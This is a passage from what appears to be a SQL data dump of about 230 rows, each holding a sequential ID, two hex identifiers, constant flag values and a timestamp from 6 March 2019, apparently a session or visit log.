(67673, '70498d735c59350e7bbba33268fd55ff', '3a9ea7f2799c2103', 0, 2, 1, '2019-03-06 17:08:27'),
(67674, '160ee4e45d33398048100ad32314827f', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:09:01'),
(67675, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 17:09:24'),
(67676, 'f373ab2f329e52f0de41dfe7ce0bbe96', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-06 17:11:51'),
(67677, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 17:12:44'),
(67678, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 17:13:29'),
(67679, '985377d14efc14893f1e140a59bdc464', '552f828db01a4f62', 0, 2, 1, '2019-03-06 17:14:03'),
(67680, '26c5d430cb4323f80b78b00f1424a9ae', '74aba437eea39f30', 0, 2, 1, '2019-03-06 17:14:40'),
(67681, 'f373ab2f329e52f0de41dfe7ce0bbe96', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-06 17:16:12'),
(67682, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 17:16:35'),
(67683, 'a2a8fc8d646da9cbbdb2ac918d63f9a7', 'f10990f26adcd1c5', 0, 2, 1, '2019-03-06 17:17:01'),
(67684, '3768b7565f72c189c5591a2adbf0c266', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-06 17:17:38'),
(67685, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 17:17:40'),
(67686, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 17:17:49'),
(67687, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 17:17:52'),
(67688, 'd2a4472d11428e9956d087bbc412ef99', 'ef40e51ef179414e', 0, 2, 1, '2019-03-06 17:20:17'),
(67689, 'c4d6e883728828db288d1c1121e84560', '35336eef02773cbe', 0, 2, 1, '2019-03-06 17:21:03'),
(67690, '69a6c6fad7bd2ba19a726e5ed4e08bda', '0eb760e081a4af82', 0, 2, 1, '2019-03-06 17:23:11'),
(67691, '69a6c6fad7bd2ba19a726e5ed4e08bda', '0eb760e081a4af82', 0, 2, 1, '2019-03-06 17:23:40'),
(67692, '90f2e2f2e300581b146ab7076f20301a', 'd872af680fb479a0', 0, 2, 1, '2019-03-06 17:25:06'),
(67693, '7680198985bcdccee0d716a3c676a639', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-06 17:25:47'),
(67694, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 17:26:56'),
(67695, 'cf402fa8f76d1871de3544acb77baa3f', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-06 17:28:15'),
(67696, 'cf402fa8f76d1871de3544acb77baa3f', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-06 17:29:01'),
(67697, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:29:01'),
(67698, '69a6c6fad7bd2ba19a726e5ed4e08bda', '0eb760e081a4af82', 0, 2, 1, '2019-03-06 17:29:17'),
(67699, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:29:23'),
(67700, '2cc41ac8acde9f6761b92c6edf3203c6', 'df2f194cea195593', 0, 2, 1, '2019-03-06 17:29:30'),
(67701, 'eae9fb2be381774334eccf69f26fb792', '76838efefa63243f', 0, 2, 1, '2019-03-06 17:30:49'),
(67702, '3768b7565f72c189c5591a2adbf0c266', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-06 17:32:46'),
(67703, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 17:34:04'),
(67704, 'eae9fb2be381774334eccf69f26fb792', '76838efefa63243f', 0, 2, 1, '2019-03-06 17:34:39'),
(67705, '7ec28cb7f50887e494355d0344206464', 'c1e9007c175ad288', 0, 2, 1, '2019-03-06 17:35:27'),
(67706, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 17:36:08'),
(67707, '7ec28cb7f50887e494355d0344206464', 'c1e9007c175ad288', 0, 2, 1, '2019-03-06 17:36:09'),
(67708, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 17:36:33'),
(67709, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 17:36:38'),
(67710, '6dcbfee6894b9e41f254480de57bb22e', '332723ec6654d9f5', 0, 2, 1, '2019-03-06 17:36:53'),
(67711, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 17:37:02'),
(67712, '801a58635f1d44fae04d157826b59521', '5546a509e0a852da', 0, 2, 1, '2019-03-06 17:37:21'),
(67713, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 17:37:38'),
(67714, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-06 17:38:06'),
(67715, '83dde4e6ba95abbcaf17bc6dc3609834', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-06 17:38:22'),
(67716, '6c754b623a856b416eee847808f8de92', 'f35451633a143113', 0, 2, 1, '2019-03-06 17:38:49'),
(67717, '6c754b623a856b416eee847808f8de92', 'f35451633a143113', 0, 2, 1, '2019-03-06 17:38:55'),
(67718, '6c754b623a856b416eee847808f8de92', 'f35451633a143113', 0, 2, 1, '2019-03-06 17:38:59'),
(67719, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 17:39:39'),
(67720, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 17:39:47'),
(67721, 'afae0c88a4b2be9387d68e04216d5ef9', 'e706e9a0184b2202', 0, 2, 1, '2019-03-06 17:39:47'),
(67722, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 17:40:07'),
(67723, '801a58635f1d44fae04d157826b59521', '5546a509e0a852da', 0, 2, 1, '2019-03-06 17:40:11'),
(67724, '9d829581a8eee1262307ef4d75541ffe', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-06 17:40:20'),
(67725, 'da975c58a5a28ea75f1dbdd4db5c3020', '32b169e936bbe5df', 0, 2, 1, '2019-03-06 17:40:23'),
(67726, '4cf81afa29186bb59008480cf102e4e7', '1c68b977b911188c', 0, 2, 1, '2019-03-06 17:40:33'),
(67727, '36c2a4f28152d1920b14491ce849079d', 'dace6e0c219330fc', 0, 2, 1, '2019-03-06 17:40:40'),
(67728, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 17:40:43'),
(67729, 'd26b4d814c0ef789b7523fa79b490625', 'a83e11812aff7ff7', 0, 2, 1, '2019-03-06 17:40:44'),
(67730, '07c34807eeb4090dc10c5c5bb7eb7ed9', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-06 17:40:45'),
(67731, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-06 17:40:45'),
(67732, '2a5df0a9178ef64b2c325cfade0d1ea9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-06 17:40:46'),
(67733, '7941d72c01ac187b1770fadf26f7f3a1', 'd982869195a81c84', 0, 2, 1, '2019-03-06 17:40:48'),
(67734, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-06 17:40:56'),
(67735, 'f0f8d0d90f2f57a3b5d332880474feaa', 'b2bafb74467116e9', 0, 2, 1, '2019-03-06 17:41:01'),
(67736, '7941d72c01ac187b1770fadf26f7f3a1', 'd982869195a81c84', 0, 2, 1, '2019-03-06 17:41:03'),
(67737, '7941d72c01ac187b1770fadf26f7f3a1', 'd982869195a81c84', 0, 2, 1, '2019-03-06 17:41:18'),
(67738, '4490a14b1afd52be4b7f315a3861f331', '4574603cf07e6399', 0, 2, 1, '2019-03-06 17:41:52'),
(67739, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 17:41:57'),
(67740, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 17:42:05'),
(67741, '0dfa78eeff0bcbac2a66ffdbe58c758b', '99ddf52c8ba9b467', 0, 2, 1, '2019-03-06 17:42:22'),
(67742, '83dde4e6ba95abbcaf17bc6dc3609834', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-06 17:42:23'),
(67743, '122b54104deb15065e80f0e78df920b3', '267638c83cee8f17', 0, 2, 1, '2019-03-06 17:42:33'),
(67744, 'cebedf41ca463c245cdb79e4ab1b1330', 'fcb5958566232b7a', 0, 2, 1, '2019-03-06 17:42:39'),
(67745, 'cebedf41ca463c245cdb79e4ab1b1330', 'fcb5958566232b7a', 0, 2, 1, '2019-03-06 17:43:02'),
(67746, '122b54104deb15065e80f0e78df920b3', '267638c83cee8f17', 0, 2, 1, '2019-03-06 17:43:03'),
(67747, '683f438c0dc6feb5d63a4edd9d94fc5e', '1b5e475496daa72c', 0, 2, 1, '2019-03-06 17:43:08'),
(67748, '5eca90d75abd13ecbd526906095c8b09', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-06 17:43:11'),
(67749, '122b54104deb15065e80f0e78df920b3', '267638c83cee8f17', 0, 2, 1, '2019-03-06 17:43:14'),
(67750, '3768b7565f72c189c5591a2adbf0c266', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-06 17:43:35'),
(67751, '122b54104deb15065e80f0e78df920b3', '267638c83cee8f17', 0, 2, 1, '2019-03-06 17:44:01'),
(67752, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 17:44:15'),
(67753, '9d829581a8eee1262307ef4d75541ffe', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-06 17:44:40'),
(67754, '26c5d430cb4323f80b78b00f1424a9ae', '74aba437eea39f30', 0, 2, 1, '2019-03-06 17:44:49'),
(67755, 'f373ab2f329e52f0de41dfe7ce0bbe96', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-06 17:46:42'),
(67756, '65f6dfc819eb43c7a95bf1904a869a72', '4dca797f4c8a12c2', 0, 2, 1, '2019-03-06 17:47:11'),
(67757, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-06 17:47:17'),
(67758, '65f6dfc819eb43c7a95bf1904a869a72', '4dca797f4c8a12c2', 0, 2, 1, '2019-03-06 17:47:37'),
(67759, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-06 17:47:44'),
(67760, 'afae0c88a4b2be9387d68e04216d5ef9', 'e706e9a0184b2202', 0, 2, 1, '2019-03-06 17:47:57'),
(67761, '70498d735c59350e7bbba33268fd55ff', '3a9ea7f2799c2103', 0, 2, 1, '2019-03-06 17:48:07'),
(67762, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 17:48:45'),
(67763, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-06 17:48:56'),
(67764, '34e3262c59b4e42fbfa15a74be463719', 'c858904cdd51199c', 0, 2, 1, '2019-03-06 17:49:36'),
(67765, '7e3f8eadbd907b029f56df88c03fa8c9', '49a04e8373719d8b', 0, 2, 1, '2019-03-06 17:50:07'),
(67766, '0d580ffb2894fc1c4954e3dac642a367', '813518eddc998d16', 0, 2, 1, '2019-03-06 17:51:58'),
(67767, 'a4127b1d347e14c07713c76dc1d9da4a', 'f69214bd1249660d', 0, 2, 1, '2019-03-06 17:52:00'),
(67768, '7680198985bcdccee0d716a3c676a639', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-06 17:52:19'),
(67769, 'b95929f18f9e9341f7e115bd4e65130c', '29a676964dd6c7a1', 0, 2, 1, '2019-03-06 17:53:40'),
(67770, '2ecfc51a9c75fe901179265af530e074', '2034f09284a4c7ca', 0, 2, 1, '2019-03-06 17:54:43'),
(67771, 'aadd0db59927f5c1c41ea8bed2067528', 'd53a1e82bf0b9288', 0, 2, 1, '2019-03-06 17:55:31'),
(67772, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 17:55:31'),
(67773, 'c85a921c14ba45fb04320dd834347093', '19e548dd12d40585', 0, 2, 1, '2019-03-06 17:55:34'),
(67774, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:57:20'),
(67775, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:57:27'),
(67776, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:57:39'),
(67777, '3768b7565f72c189c5591a2adbf0c266', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-06 17:58:19'),
(67778, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:58:22'),
(67779, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:58:28'),
(67780, 'b95929f18f9e9341f7e115bd4e65130c', '29a676964dd6c7a1', 0, 2, 1, '2019-03-06 17:59:21'),
(67781, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 17:59:52'),
(67782, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 18:00:17'),
(67783, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 18:01:10'),
(67784, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 18:01:34'),
(67785, '07c34807eeb4090dc10c5c5bb7eb7ed9', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-06 18:03:33'),
(67786, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 18:03:47'),
(67787, '801a58635f1d44fae04d157826b59521', '5546a509e0a852da', 0, 2, 1, '2019-03-06 18:04:17'),
(67788, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 18:04:47'),
(67789, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 18:07:41'),
(67790, '801a58635f1d44fae04d157826b59521', '5546a509e0a852da', 0, 2, 1, '2019-03-06 18:08:03'),
(67791, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 18:09:18'),
(67792, '801a58635f1d44fae04d157826b59521', '5546a509e0a852da', 0, 2, 1, '2019-03-06 18:09:58'),
(67793, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 18:11:34'),
(67794, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 18:12:23'),
(67795, '07c34807eeb4090dc10c5c5bb7eb7ed9', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-06 18:14:46'),
(67796, '6dcbfee6894b9e41f254480de57bb22e', '332723ec6654d9f5', 0, 2, 1, '2019-03-06 18:14:56'),
(67797, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 18:15:42'),
(67798, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 18:17:39'),
(67799, '68e37055779a48fd3d39ed3c83391d99', '7fb70215b727bf46', 0, 2, 1, '2019-03-06 18:18:43'),
(67800, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 18:27:02'),
(67801, 'c8afe11a484c25e5edb721debb14bebb', '1791b1aeb2327e22', 0, 2, 1, '2019-03-06 18:27:32'),
(67802, 'c8afe11a484c25e5edb721debb14bebb', '1791b1aeb2327e22', 0, 2, 1, '2019-03-06 18:27:39'),
(67803, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 18:29:33'),
(67804, 'ee0b22c5e2bf09205eab343802030c48', 'a83e11812aff7ff7', 0, 2, 1, '2019-03-06 18:29:53'),
(67805, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 18:30:05'),
(67806, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 18:30:27'),
(67807, '2c7db87ac06bf4a09c7ddc2a42cf4186', '68e262710bf07c1c', 0, 2, 1, '2019-03-06 18:32:23'),
(67808, '4eb6f36a909096f0cfe87c84c40f7ed6', 'c020abbb40884763', 0, 2, 1, '2019-03-06 18:40:31'),
(67809, '4eb6f36a909096f0cfe87c84c40f7ed6', 'c020abbb40884763', 0, 2, 1, '2019-03-06 18:41:03'),
(67810, '0a9ab66cf63a2d0df14c6dc7f090155c', '5fa71acfcd440189', 0, 2, 1, '2019-03-06 18:43:01'),
(67811, '0a9ab66cf63a2d0df14c6dc7f090155c', '5fa71acfcd440189', 0, 2, 1, '2019-03-06 18:43:27'),
(67812, 'd0cdfa13ead036347872d50075e97d05', '19ac418837a1bfb6', 0, 2, 1, '2019-03-06 18:49:04'),
(67813, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 18:49:09'),
(67814, 'd0cdfa13ead036347872d50075e97d05', '19ac418837a1bfb6', 0, 2, 1, '2019-03-06 18:49:19'),
(67815, '99343849f64cda233aa32ddd886c4416', '5c81ab05b2efe0d8', 0, 2, 1, '2019-03-06 18:49:40'),
(67816, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 18:49:44'),
(67817, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 18:50:11'),
(67818, '83dde4e6ba95abbcaf17bc6dc3609834', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-06 18:51:16'),
(67819, '99343849f64cda233aa32ddd886c4416', '5c81ab05b2efe0d8', 0, 2, 1, '2019-03-06 18:51:38'),
(67820, '99343849f64cda233aa32ddd886c4416', '5c81ab05b2efe0d8', 0, 2, 1, '2019-03-06 18:51:52'),
(67821, '8f5c67a2305e02c38c1cc665be636671', 'c82195f7827b9487', 0, 2, 1, '2019-03-06 18:53:01'),
(67822, '0a9ab66cf63a2d0df14c6dc7f090155c', '5fa71acfcd440189', 0, 2, 1, '2019-03-06 18:54:11'),
(67823, '40a5de45dd616d4b7122605d2316d850', 'd04e7300519a9043', 0, 2, 1, '2019-03-06 18:56:56'),
(67824, '3a17b1f474f739d376b7983dc15701b9', '0ba84ee0907c0ffb', 0, 2, 1, '2019-03-06 18:58:32'),
(67825, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 19:00:56'),
(67826, '6dcbfee6894b9e41f254480de57bb22e', '332723ec6654d9f5', 0, 2, 1, '2019-03-06 19:01:09'),
(67827, 'a365f784481d7ab32d3c6ace2979b08c', '92127ae1b4d5b310', 0, 2, 1, '2019-03-06 19:01:36'),
(67828, 'ee0b22c5e2bf09205eab343802030c48', 'a83e11812aff7ff7', 0, 2, 1, '2019-03-06 19:02:12'),
(67829, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 19:03:45'),
(67830, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 19:03:51'),
(67831, '07902b79e760711ca552ae7fe3d0fb83', '37d5c5fe24dcdfce', 0, 2, 1, '2019-03-06 19:04:02'),
(67832, '07902b79e760711ca552ae7fe3d0fb83', '37d5c5fe24dcdfce', 0, 2, 1, '2019-03-06 19:04:16'),
(67833, '8c3e1b06f04fbc68c0a56d90afc89b8f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-06 19:05:12'),
(67834, '3c3fb491b54f41b973f4eb47395dbe1f', 'a7a7b4bbea82be21', 0, 2, 1, '2019-03-06 19:05:50'),
(67835, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 19:10:00'),
(67836, 'f5e365df2de39919a24e088818477397', 'c6be380ff4275e45', 0, 2, 1, '2019-03-06 19:10:15'),
(67837, '08bc6aa1720ae5e18acef1a753fc2635', '0530018377078939', 0, 2, 1, '2019-03-06 19:10:21'),
(67838, '5eca90d75abd13ecbd526906095c8b09', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-06 19:13:06'),
(67839, 'fcd4baa0f6dc193b80d380af9037b2f2', '57884e5fd0d535cb', 0, 2, 1, '2019-03-06 19:13:44'),
(67840, 'cf402fa8f76d1871de3544acb77baa3f', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-06 19:13:52'),
(67841, 'f5e365df2de39919a24e088818477397', 'c6be380ff4275e45', 0, 2, 1, '2019-03-06 19:14:27'),
(67842, 'fcd4baa0f6dc193b80d380af9037b2f2', '57884e5fd0d535cb', 0, 2, 1, '2019-03-06 19:15:56'),
(67843, 'fcd4baa0f6dc193b80d380af9037b2f2', '57884e5fd0d535cb', 0, 2, 1, '2019-03-06 19:16:18'),
(67844, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 19:18:40'),
(67845, 'dc5bf84b5b1483f35730239227cf658c', 'f7219a62f6d3479e', 0, 2, 1, '2019-03-06 19:22:55'),
(67846, 'dbdbf6a0639502feadbf8941c0e9903c', '33addfb37288dbc5', 0, 2, 1, '2019-03-06 19:23:21'),
(67847, 'dbdbf6a0639502feadbf8941c0e9903c', '33addfb37288dbc5', 0, 2, 1, '2019-03-06 19:23:28'),
(67848, '0a9ab66cf63a2d0df14c6dc7f090155c', '5fa71acfcd440189', 0, 2, 1, '2019-03-06 19:24:06'),
(67849, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 19:24:40'),
(67850, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 19:25:37'),
(67851, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 19:25:40'),
(67852, '07c34807eeb4090dc10c5c5bb7eb7ed9', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-06 19:28:37'),
(67853, 'dc5bf84b5b1483f35730239227cf658c', 'f7219a62f6d3479e', 0, 2, 1, '2019-03-06 19:29:12'),
(67854, 'dbdbf6a0639502feadbf8941c0e9903c', '33addfb37288dbc5', 0, 2, 1, '2019-03-06 19:31:17'),
(67855, '08bc6aa1720ae5e18acef1a753fc2635', '0530018377078939', 0, 2, 1, '2019-03-06 19:31:56'),
(67856, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 19:32:17'),
(67857, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 19:33:07'),
(67858, 'c1cfa3dc115cba57866594b4a46b019c', '363222863b4a27e7', 0, 2, 1, '2019-03-06 19:33:34'),
(67859, '0308659ebe93e0e5254211fe01918d86', 'eefa0d787d0e7202', 0, 2, 1, '2019-03-06 19:34:07'),
(67860, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 19:35:11'),
(67861, 'f7f1be9a8679c81dce2bc9cf711194c1', '9ce6f87eed9d7b6a', 0, 2, 1, '2019-03-06 19:35:49'),
(67862, 'cfeda08a748d00958d678b9ce8eb905c', 'edfe950d47379572', 0, 2, 1, '2019-03-06 19:35:58'),
(67863, '1aaeeb589d504f6cbf1093012ded0431', '21a75882f832ae93', 0, 2, 1, '2019-03-06 19:41:47'),
(67864, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 19:42:36'),
(67865, '0a9ab66cf63a2d0df14c6dc7f090155c', '5fa71acfcd440189', 0, 2, 1, '2019-03-06 19:42:51'),
(67866, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 19:42:51'),
(67867, '634012141a533814505d686a1d6c719f', '8ad007cf09224cd8', 0, 2, 1, '2019-03-06 19:42:57'),
(67868, '08bc6aa1720ae5e18acef1a753fc2635', '0530018377078939', 0, 2, 1, '2019-03-06 19:43:09'),
(67869, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 19:43:18'),
(67870, '65f6dfc819eb43c7a95bf1904a869a72', '4dca797f4c8a12c2', 0, 2, 1, '2019-03-06 19:43:19'),
(67871, '8c3e1b06f04fbc68c0a56d90afc89b8f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-06 19:43:23'),
(67872, 'a9f7fd3003d9ca427806e39222122225', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-06 19:43:24'),
(67873, '2a5df0a9178ef64b2c325cfade0d1ea9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-06 19:43:41'),
(67874, '83dde4e6ba95abbcaf17bc6dc3609834', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-06 19:43:55'),
(67875, '08bc6aa1720ae5e18acef1a753fc2635', '0530018377078939', 0, 2, 1, '2019-03-06 19:43:55'),
(67876, '4cf81afa29186bb59008480cf102e4e7', '1c68b977b911188c', 0, 2, 1, '2019-03-06 19:43:56'),
(67877, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 19:43:57'),
(67878, '2a5df0a9178ef64b2c325cfade0d1ea9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-06 19:44:05'),
(67879, '6c754b623a856b416eee847808f8de92', 'f35451633a143113', 0, 2, 1, '2019-03-06 19:44:05'),
(67880, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:44:07'),
(67881, '36c2a4f28152d1920b14491ce849079d', 'dace6e0c219330fc', 0, 2, 1, '2019-03-06 19:44:09'),
(67882, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 19:44:15'),
(67883, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 19:44:16'),
(67884, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:44:16'),
(67885, '65f6dfc819eb43c7a95bf1904a869a72', '4dca797f4c8a12c2', 0, 2, 1, '2019-03-06 19:44:24'),
(67886, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:44:24'),
(67887, '2a5df0a9178ef64b2c325cfade0d1ea9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-06 19:44:25'),
(67888, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-03-06 19:44:27'),
(67889, '8c3e1b06f04fbc68c0a56d90afc89b8f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-06 19:44:28'),
(67890, '0a9ab66cf63a2d0df14c6dc7f090155c', '5fa71acfcd440189', 0, 2, 1, '2019-03-06 19:44:30'),
(67891, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 19:44:32'),
(67892, '5af26c63c3b4ca11831170c3264afbce', '7501b42c35accff7', 0, 2, 1, '2019-03-06 19:44:34'),
(67893, 'afae0c88a4b2be9387d68e04216d5ef9', 'e706e9a0184b2202', 0, 2, 1, '2019-03-06 19:44:34'),
(67894, '07c34807eeb4090dc10c5c5bb7eb7ed9', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-06 19:44:35'),
(67895, '83dde4e6ba95abbcaf17bc6dc3609834', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-06 19:44:39'),
(67896, 'ae8c181418a70c321db123001300f534', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-06 19:44:51'),
(67897, '5050262db5f5cdc080d6574ef3c258e5', 'fa806d00382b386f', 0, 2, 1, '2019-03-06 19:46:11'),
(67898, '5050262db5f5cdc080d6574ef3c258e5', 'fa806d00382b386f', 0, 2, 1, '2019-03-06 19:46:32'),
(67899, 'dbdbf6a0639502feadbf8941c0e9903c', '33addfb37288dbc5', 0, 2, 1, '2019-03-06 19:46:43'),
(67900, 'dc5bf84b5b1483f35730239227cf658c', 'f7219a62f6d3479e', 0, 2, 1, '2019-03-06 19:52:23'),
(67901, 'd7d7a556d058b36be3a9a16ac277fcf1', '8d96482d446e2629', 0, 2, 1, '2019-03-06 19:53:19'),
(67902, '8c3e1b06f04fbc68c0a56d90afc89b8f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-06 19:53:20'),
